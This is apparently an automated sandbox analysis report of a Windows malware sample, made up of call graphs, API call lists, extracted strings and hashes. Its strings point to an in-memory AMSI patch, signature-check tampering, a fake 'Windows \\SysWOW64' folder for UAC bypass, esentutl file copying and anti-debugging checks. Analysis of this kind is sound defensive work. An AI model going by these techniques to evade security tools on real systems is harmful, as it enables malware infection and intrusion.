31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 * 16 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31b7c10 call 31b8338 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ExitProcess 8990->9173 9172->9173 9188 31c953f-31c9812 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bf094 call 31a4860 call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a7e5c 9172->9188 9604 31c9aef-31c9cf0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49f8 call 31b8d70 9188->9604 9605 31c9818-31c9aea call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be358 call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4de0 * 2 call 31a4764 call 31bdc8c 9188->9605 9359 31c887b-31c887e 9201->9359 9360 31c8880-31c8ba0 call 31a49f8 call 31bde50 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bd164 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 9201->9360 9202->9201 9359->9360 9896 31c8bb9-31c939c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ResumeThread call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8080 call 31b894c * 6 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 9360->9896 9897 31c8ba2-31c8bb4 call 31b8730 9360->9897 9579->9580 9604->9173 9605->9604 9646->8666 9647->9646 9896->8990 9897->9896
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031BDC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDCCB
                                                                                                • Part of subcall function 031BDC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 031BDD32
                                                                                                • Part of subcall function 031BDC8C: NtClose.NTDLL(?), ref: 031BDD3B
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03223160,031CB7B8,UacScan,03223160,031CB7B8,ScanString,03223160,031CB7B8,031CBB30,00000000,00000000,031CBB24,00000000,00000000), ref: 031C40CB
                                                                                                • Part of subcall function 031B88B8: LoadLibraryW.KERNEL32(amsi), ref: 031B88C1
                                                                                                • Part of subcall function 031B88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031B8920
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,000003E8,ScanBuffer,03223160,031CB7B8,UacScan,03223160), ref: 031C4277
                                                                                                • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                                • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                                • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                              • Sleep.KERNEL32(00004E20,UacScan,03223160,031CB7B8,ScanString,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacInitialize,03223160,031CB7B8), ref: 031C50EE
                                                                                                • Part of subcall function 031BDC04: RtlInitUnicodeString.NTDLL ref: 031BDC2C
                                                                                                • Part of subcall function 031BDC04: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 031BDC42
                                                                                                • Part of subcall function 031BDC04: NtDeleteFile.NTDLL(?), ref: 031BDC61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Path$FreeSleep$FileLoadNameName_$AddressCloseDeleteInitProcStringUnicodeWrite
                                                                                              • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                              • API String ID: 3582580975-3926298568
                                                                                              • Opcode ID: d7d22ae7bd1a24751658264ab469f360089b2f5f20b60e7b88dfbf0e46e2b733
                                                                                              • Instruction ID: 71db41d507aa55cb6b803294e09cec8969b923b6701cdaa7fb98a0e2cad5042d
                                                                                              • Opcode Fuzzy Hash: d7d22ae7bd1a24751658264ab469f360089b2f5f20b60e7b88dfbf0e46e2b733
                                                                                              • Instruction Fuzzy Hash: E9432E3C61865D9FCB20EBA9DC81ACE73B5AF9D602F1080A59508AF754DF70AE85CF41
                                                                                              Function 031A1727 Relevance: 9.0, APIs: 7, Instructions: 288sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 12842 31a1727-31a1736 12843 31a1968-31a196d 12842->12843 12844 31a173c-31a174c 12842->12844 12845 31a1973-31a1984 12843->12845 12846 31a1a80-31a1a83 12843->12846 12847 31a174e-31a175b 12844->12847 12848 31a17a4-31a17ad 12844->12848 12849 31a1938-31a1945 12845->12849 12850 31a1986-31a19a2 12845->12850 12852 31a1a89-31a1a8b 12846->12852 12853 31a1684-31a16ad VirtualAlloc 12846->12853 12854 31a175d-31a176a 12847->12854 12855 31a1774-31a1780 12847->12855 12848->12847 12851 31a17af-31a17bb 12848->12851 12849->12850 12863 31a1947-31a195b Sleep 12849->12863 12858 31a19b0-31a19bf 12850->12858 12859 31a19a4-31a19ac 12850->12859 12851->12847 12860 31a17bd-31a17c9 12851->12860 12861 31a16df-31a16e5 12853->12861 12862 31a16af-31a16dc call 31a1644 12853->12862 12864 31a176c-31a1770 12854->12864 12865 31a1794-31a17a1 12854->12865 12856 31a1782-31a1790 12855->12856 12857 31a17f0-31a17f9 12855->12857 12871 31a17fb-31a1808 12857->12871 12872 31a182c-31a1836 12857->12872 12867 31a19d8-31a19e0 12858->12867 12868 31a19c1-31a19d5 12858->12868 12866 31a1a0c-31a1a22 12859->12866 12860->12847 12869 31a17cb-31a17de Sleep 12860->12869 12862->12861 12863->12850 12873 31a195d-31a1964 Sleep 12863->12873 12879 31a1a3b-31a1a47 12866->12879 12880 31a1a24-31a1a32 12866->12880 12875 31a19fc-31a19fe call 31a15cc 12867->12875 12876 31a19e2-31a19fa 12867->12876 12868->12866 12869->12847 12874 31a17e4-31a17eb Sleep 12869->12874 12871->12872 12878 31a180a-31a181e Sleep 12871->12878 12881 31a18a8-31a18b4 12872->12881 12882 31a1838-31a1863 12872->12882 12873->12849 12874->12848 12885 31a1a03-31a1a0b 12875->12885 12876->12885 12878->12872 12887 31a1820-31a1827 Sleep 12878->12887 12891 31a1a68 12879->12891 12892 31a1a49-31a1a5c 12879->12892 12880->12879 12888 31a1a34 12880->12888 12883 31a18dc-31a18eb call 31a15cc 12881->12883 12884 31a18b6-31a18c8 12881->12884 12889 31a187c-31a188a 12882->12889 12890 31a1865-31a1873 12882->12890 12903 31a18fd-31a1936 12883->12903 12907 31a18ed-31a18f7 12883->12907 12897 31a18ca 12884->12897 12898 31a18cc-31a18da 12884->12898 12887->12871 12888->12879 12893 31a18f8 12889->12893 12894 31a188c-31a18a6 call 31a1500 12889->12894 12890->12889 12900 31a1875 12890->12900 12896 31a1a6d-31a1a7f 12891->12896 12895 31a1a5e-31a1a63 call 31a1500 12892->12895 12892->12896 12893->12903 12894->12903 12895->12896 12897->12898 12898->12903 12900->12889
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 031A17D0
                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 031A17E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 0b653f732f2a7654bbad9c16bb3a5da014e32f49afd5debfd5ad4bec20c14e13
                                                                                              • Instruction ID: a900727662a8f8fdddd1e80277177d63714fef98cdad5af3c002e48c306762cb
                                                                                              • Opcode Fuzzy Hash: 0b653f732f2a7654bbad9c16bb3a5da014e32f49afd5debfd5ad4bec20c14e13
                                                                                              • Instruction Fuzzy Hash: 2DB1457A600B50AFC725EF6DE884365FBE0EB8A352F19C2BED4198B389C7709441C790
                                                                                              Function 031B894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 12908 31b894c-31b8971 LoadLibraryW 12909 31b89bb-31b89c1 12908->12909 12910 31b8973-31b898b GetProcAddress 12908->12910 12911 31b898d-31b89ac call 31b7d78 12910->12911 12912 31b89b0-31b89b6 FreeLibrary 12910->12912 12911->12912 12915 31b89ae 12911->12915 12912->12909 12915->12912
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                              • GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                              • FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                              • API String ID: 1002360270-4067648912
                                                                                              • Opcode ID: 97c5b1513f4323c685f0dd5dbb158ec89855aed9199f460e5edcb2e4945c1015
                                                                                              • Instruction ID: 88cdc3519d029fa3ec24f9d8d61988db2c7fa09c6f1be368fdd340c0252a3137
                                                                                              • Opcode Fuzzy Hash: 97c5b1513f4323c685f0dd5dbb158ec89855aed9199f460e5edcb2e4945c1015
                                                                                              • Instruction Fuzzy Hash: 28F08C71609354FFE730FA6CBC8DF9677AC97A8A21F085129AD088A186C77018808750
                                                                                              Function 031B88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 031B88C1
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031B8920
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                              • API String ID: 2980007069-2671292670
                                                                                              • Opcode ID: fbbb97e11304113df3e7035999d04f9dcbe778440396e5bef9254dc137eb37cb
                                                                                              • Instruction ID: f04a340fb6a461c047079bb7019bad0cccf6b7640e725ba41c93666e874dde4a
                                                                                              • Opcode Fuzzy Hash: fbbb97e11304113df3e7035999d04f9dcbe778440396e5bef9254dc137eb37cb
                                                                                              • Instruction Fuzzy Hash: 44F0879454C781BBC601E678CC45F8FBADC4BAA564F048A58F1E8AE2D2D77AD10483A7
                                                                                              Function 031BF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 12925 31bf744-31bf75e GetModuleHandleW 12926 31bf78a-31bf792 12925->12926 12927 31bf760-31bf772 GetProcAddress 12925->12927 12927->12926 12928 31bf774-31bf784 CheckRemoteDebuggerPresent 12927->12928 12928->12926 12929 31bf786 12928->12929 12929->12926
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 031BF754
                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031BF766
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031BF77D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                              • API String ID: 35162468-539270669
                                                                                              • Opcode ID: 8cff3ba7880fa5bf20dc5e3b6f071af4b7409acb740b2325bc2ca1f3e5e30db4
                                                                                              • Instruction ID: 6afbb7447d63ac36538746888fdf2a179c44baa55de7c84b28b55d261f7f7c72
                                                                                              • Opcode Fuzzy Hash: 8cff3ba7880fa5bf20dc5e3b6f071af4b7409acb740b2325bc2ca1f3e5e30db4
                                                                                              • Instruction Fuzzy Hash: 10F0A075904248BFDB10EAF98C887DCFBB89B0D226F2843D0E434A21D2E7710685C691
                                                                                              Function 031A1A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 12930 31a1a8f-31a1a9b 12931 31a1b6c-31a1b6f 12930->12931 12932 31a1aa1-31a1aa5 12930->12932 12933 31a1c5c-31a1c60 12931->12933 12934 31a1b75-31a1b7f 12931->12934 12935 31a1b08-31a1b11 12932->12935 12936 31a1aa7-31a1aae 12932->12936 12937 31a16e8-31a170b call 31a1644 VirtualFree 12933->12937 12938 31a1c66-31a1c6b 12933->12938 12940 31a1b3c-31a1b49 12934->12940 12941 31a1b81-31a1b8d 12934->12941 12935->12936 12939 31a1b13-31a1b27 Sleep 12935->12939 12942 31a1adc-31a1ade 12936->12942 12943 31a1ab0-31a1abb 12936->12943 12959 31a170d-31a1714 12937->12959 12960 31a1716 12937->12960 12939->12936 12947 31a1b2d-31a1b38 Sleep 12939->12947 12940->12941 12948 31a1b4b-31a1b5f Sleep 12940->12948 12949 31a1b8f-31a1b92 12941->12949 12950 31a1bc4-31a1bd2 12941->12950 12944 31a1af3 12942->12944 12945 31a1ae0-31a1af1 12942->12945 12951 31a1abd-31a1ac2 12943->12951 12952 31a1ac4-31a1ad9 12943->12952 12953 31a1af6-31a1b03 12944->12953 12945->12944 12945->12953 12947->12935 12948->12941 12957 31a1b61-31a1b68 Sleep 12948->12957 12954 31a1b96-31a1b9a 12949->12954 12950->12954 12955 31a1bd4-31a1bd9 call 31a14c0 12950->12955 12953->12934 12961 31a1bdc-31a1be9 12954->12961 12962 31a1b9c-31a1ba2 12954->12962 12955->12954 12957->12940 12967 31a1719-31a1723 12959->12967 12960->12967 12961->12962 12966 31a1beb-31a1bf2 call 31a14c0 12961->12966 12963 31a1bf4-31a1bfe 12962->12963 12964 31a1ba4-31a1bc2 call 31a1500 12962->12964 12970 31a1c2c-31a1c59 call 31a1560 12963->12970 12971 31a1c00-31a1c28 VirtualFree 12963->12971 12966->12962
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 031A1B17
                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 031A1B31
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 3c3027a1fe770c552e5e042d572b46038b4a786e6f4d6aa34d99576ef22bf97a
                                                                                              • Instruction ID: e8758a365e7218650fbb20e89ca4aa5185d2713ce8dcd1e6300cf26db6d5652e
                                                                                              • Opcode Fuzzy Hash: 3c3027a1fe770c552e5e042d572b46038b4a786e6f4d6aa34d99576ef22bf97a
                                                                                              • Instruction Fuzzy Hash: CE51F379600B40AFD725DF6CD984766BBE4AF4E312F1881BED848CB296E7B0C445C791
                                                                                              Function 031BE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 86f4675884911a6df7512431eec5d7227268b15a94e32a2aa81812ddd9439287
                                                                                              • Instruction ID: 51ebb6483d23eb9fbb482b36b0ddbdb1479209c7167c296e3905acf7328bed42
                                                                                              • Opcode Fuzzy Hash: 86f4675884911a6df7512431eec5d7227268b15a94e32a2aa81812ddd9439287
                                                                                              • Instruction Fuzzy Hash: 0941EE3DB1464C9FDB10EBA9E881ADEB3B9EF8C601F604425E050AB350DFB4AD158B65
                                                                                              Function 031BE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 52cd248eaa31f3eea405475792f22924ec6c71a4bce8fe76a0611a8cc1b638df
                                                                                              • Instruction ID: 0fc9591a10497e8df536f2588aaccb07e97c882509b0d9404bfd8e87706e932e
                                                                                              • Opcode Fuzzy Hash: 52cd248eaa31f3eea405475792f22924ec6c71a4bce8fe76a0611a8cc1b638df
                                                                                              • Instruction Fuzzy Hash: 8241FF3DA1464C9FDB10EBA9E881ADEB3B9EF8C601F604425E050AB350DFB4AD158B65
                                                                                              Function 031B8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CreateHandleModuleProcessUser
                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                              • API String ID: 952078031-2353454454
                                                                                              • Opcode ID: b1978c2b0be9e1aeee43ebd8d4df1038a2ab4303ac0ace2e04214b946da5e108
                                                                                              • Instruction ID: 48b3503bd3a17c879d479350e6e01312f1a2da7293e541ea07486ed520caca87
                                                                                              • Opcode Fuzzy Hash: b1978c2b0be9e1aeee43ebd8d4df1038a2ab4303ac0ace2e04214b946da5e108
                                                                                              • Instruction Fuzzy Hash: 481192BA604648BFDB50EEADEC91FDA77ECEB4CA00F514060FA08D7641C774E9108B65
